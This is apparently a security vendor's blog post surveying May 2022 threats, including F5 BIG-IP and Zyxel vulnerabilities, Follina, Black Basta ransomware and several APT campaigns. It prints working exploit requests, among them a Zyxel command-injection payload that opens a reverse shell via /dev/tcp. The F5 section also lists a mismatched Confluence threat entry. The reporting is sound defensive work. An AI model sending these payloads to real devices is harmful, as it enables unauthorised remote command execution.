Emerging Cyber Threats of May 2022

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

Newly discovered critical vulnerabilities, emerging cyber threat groups, and high-impact malware attacks made May 2022 a busy month for cyber threat actors and security teams. Picus Labs swiftly added attack simulations to Picus Threat Library for these new threats as they were discovered. 

In this blog post, we curated a list of top cyber threats observed in May 2022. You can easily test your security controls against each threat with the Picus Complete Security Control Validation Platform.

Simulate Emerging Cyber Threats with 14-Day Free Trial of the Picus Platform

Top Cyber Threats of May 2022

1. F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability
2. Follina - Microsoft Office CVE-2022-30190 Vulnerability
3. Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability
4. The Black Basta Ransomware Campaign
5. Bitter APT Group
6. Exotic Lily APT Group - Bumblebee Malware
7. Twisted Panda APT group - Cyber Espionage Campaign


1. F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability

On May 4th, 2022, F5 Network published an advisory on CVE-2022-1388 remote code execution vulnerability [1]. F5 BIG-IP product allows its users to run commands as administrator remotely using the "/mgmt/tm/util/bash" service. Adversaries can exploit this feature to execute malicious commands with elevated privileges because "/mgmt/tm/util/bash" service does not require a password or authentication. 

POST /mgmt/tm/util/bash HTTP/1.1
Host: <IP_of_target_f5_product>:8443
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host
X-Forwarded-For: localhost
Content-Length: 0
{"command": "run" , "utilCmdArgs": " -c 'whoami' " }

Example Code 1: Post request example for F5 BIG-IP iControl REST (CVE-2022-1388) Vulnerability Exploitation

Due to the widespread use of F5 BIG-IP, the vulnerability may lead to high-impact cyber-attacks if the vulnerable products are not patched. The CVSS score of the CVE-2022-1388 vulnerability is 9.8 Critical. Organizations should patch their products as soon as possible and update to versions 16.1.2.2, 15.1.5.1, 14.1.4.6, 13.1.5, or higher.

Picus Threat Library includes the following threat for CVE-2022-26134 vulnerability: 

Threat ID

Threat Name

58423

Atlassian Confluence Web Attack Campaign

For more detailed information, you can check our blog post on "Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits".

2. Follina - Microsoft Office CVE-2022-30190 Vulnerability

On May 27th, 2022, the nao_sec cyber security research team found a malicious Word document that retrieves a remote HTML file and executes commands in it using Microsoft Support Diagnostic Tool (ms-msdt) [2]. In a benign operation, a Microsoft Office document should not be able to spawn the ms-msdt process. However, the CVE-2022-30190 vulnerability enables adversaries to craft a malicious Office document and run arbitrary commands using ms-msdt process. The vulnerability is later named Follina, and it has a CVSS score of 7.8 High.

Microsoft released an advisory on how to disable Microsoft Office from using Microsoft Support Diagnostic Tool. Organizations are advised to apply the suggested workaround and reduce their attack surface.

Picus Threat Library includes the following threats for Follina - Microsoft Office CVE-2022-30190 Vulnerability:

Threat ID

Threat Name

71494

Microsoft Support Diagnostics Tool (MSDT) Attack Campaign (CVE-2022-30190)

23559

MSDT Compatibility Troubleshooter Vulnerability Threat (Network Infiltration)

43958

MSDT Compatibility Troubleshooter Vulnerability Threat (Email Infiltration (Phishing))

Please check our blog post for more detailed information.

3. The Black Basta Ransomware Campaign

In late April 2022, a malicious actor named Black Basta posted an advertisement on underground forums for initial access to organizations based in the US, UK, Canada, Australia, and New Zealand [3]. Using the stolen or illegally purchased credentials, the Black Basta ransomware group started infecting multiple organizations with ransomware. Techniques, tactics, and procedures (TTPs) used by the Black Basta are similar to the recently disbanded Conti ransomware group. This similarity led security professionals to think that the Black Basta might be a rebranded Conti group [4].


Figure 1: Victim's wallpaper after Black Basta ransomware infection

The Black Basta operators display recent ransomware trends in their attack campaigns.

  • Use of initial access brokers (IABs)
  • Data exfiltration for the multiple extortion
  • Deleting or damaging built-in recovery systems

Although the ransomware itself requires administrative privileges, organizations should be aware of TTPs used by the Black Basta ransomware group.

Picus Threat Library includes the following threats for the Black Basta ransomware

Threat ID

Threat Name

73218

Black Basta Ransomware Download Threat

53426

Black Basta Ransomware Email Threat

4. Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability

Rapid7 reported an unauthenticated remote code injection vulnerability in Zyxel Firewalls on May 12th, 2022 [5]. CVE-2022-30525 vulnerability has a CVSSv3 score of 9.8 Critical. The vulnerability affects various Zyxel products given in the table below. 

Affected Zyxel models

Affected Firmware versions

ATP 100, 200, 500, 700, 800

ZLD5.10 thru ZLD5.21 Patch 1

USG20-VPN, USG20W-VPN

ZLD5.10 thru ZLD5.21 Patch 1

USG FLEX 100, 100W, 200, 500, 700

ZLD5.00 thru ZLD5.21 Patch 1

Adversaries can abuse this vulnerability and execute commands as the "nobody" user via an administrative HTTP interface without authentication. According to Rapid7, there are more than 15000 products that are vulnerable to CVE-2022-30525, and patching the vulnerable products is advised.

POST /page486402/ztp/cgi-bin/handler HTTP/1.1
User-Agent: curl/7.79.1
Accept: */*
Content-Type: application/json
Content-Length: 168
Connection: close
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged": "1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/192.168.1.220/1270 <&1;\";","data":"hi"}

Example Code 2: Post request example for Zyxel Firewall Remote Code Injection (CVE-2022-30525) Vulnerability Exploitation

Picus Threat Library includes the following threat for CVE-2022-30525 vulnerability: 

Threat ID

Threat Name

84862

Zyxel Web Attack Campaign

5. Bitter APT Group

On May 11th, 2022, Cisco Talos Intelligence Group reported that a known South Asian cyber threat group called Bitter (T-APT-17) APT group started to attack Bangladesh's governmental organizations for the purpose of espionage [6]. This attack utilizes new variants of malware and shows that the threat group is targeting outside of its usual target countries, such as China, Pakistan, and Saudi Arabia. 

The Bitter APT group sends spearphishing emails to their target for initial access. When a user opens the malicious attachment, the document connects to and downloads additional malware named "ZxxZ" from the threat group's C2 server by exploiting Microsoft Office vulnerabilities such as CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.

Picus Threat Library includes the following threats for the Bitter APT group

Threat ID

Threat Name

62442

Bitter Threat Group Campaign Malware Downloader Download Threat

56532

Bitter Threat Group Campaign Malware Downloader Email Threat

63761

Bitter RAT Email Threat

47230

Bitter RAT Download Threat

6. Exotic Lily APT Group - Bumblebee Malware

Exotic Lily is an Initial Access Broker (IAB) affiliated with Russian cybercriminal groups such as FIN12, Wizard Spider, and Conti. On May 17th, 2022, Google Threat Analysis Group published a blog post on the Bumblebee malware campaign of the Exotic Lily APT group [7].

Threat actors set up fake personas and email addresses for their phishing campaign and distribute the Bumblebee malware using legitimate file-sharing services such as TransferNow, TransferXL, WeTransfer, and OneDrive. The Bumblebee malware is a backdoor that allows adversaries remote access to their victims. In the past, the Exotic Lily APT group was known to use BazarLoader malware which seems to be replaced by the Bumblebee malware.

Picus Threat Library includes the following threats for the Bumblebee malware:

Threat ID

Threat Name

50902

Bumblebee Malware Download Threat

90629

Bumblebee Malware Email Threat

7. Twisted Panda APT group - Cyber Espionage Campaign

Twisted Panda APT group is a Chinese cyber espionage group that is capable of adapting and adjusting to world events and new technologies. Check Point Research uncovered a targeted cyber espionage campaign against Russian R&D facilities conducted by the Chinese APT group Twisted Panda on May 19th, 2022 [8]. The Russian-based R&D institutions have limited access to valuable resources due to sanctions. Adversaries send these institutions phishing emails with a malicious document masquerading as a "List of names under US sanctions". When an unsuspecting user opens up the malicious document, the target system is infected with a backdoor called Spinner that is used to steal confidential information.

Picus Threat Library includes the following threats for the Twisted Panda APT group:

Threat ID

Threat Name

96806

Twisted Panda Threat Group Campaign Malware Download Threat

49294

Twisted Panda Threat Group Campaign Malware Downloader Download Threat

39229

Twisted Panda Threat Group Campaign Malware Email Threat

25909

Twisted Panda Threat Group Campaign Malware Downloader Email Threat

References

[1] https://support.f5.com/csp/article/K23605346

[2] https://twitter.com/nao_sec/status/1530196847679401984

[3] "Examining the Black Basta Ransomware's Infection Routine," Trend Micro, May 09, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

[4] L. Abrams, "New Black Basta ransomware springs into action with a dozen breaches," BleepingComputer, Apr. 27, 2022. [Online]. Available: https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

[5] J. Baines, "CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection," Rapid7, May 12, 2022. [Online]. Available: https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

[6] C. Raghuprasad, "Bitter APT adds Bangladesh to their targets." [Online]. Available: http://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

[7] V. Stolyarov, "Exposing initial access broker with ties to Conti," Google, Mar. 17, 2022. [Online]. Available: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

[8] I. Cohen, "Twisted Panda: Chinese APT espionage operation against Russian's state-owned defense institutes," Check Point Research, May 19, 2022. [Online]. Available: https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/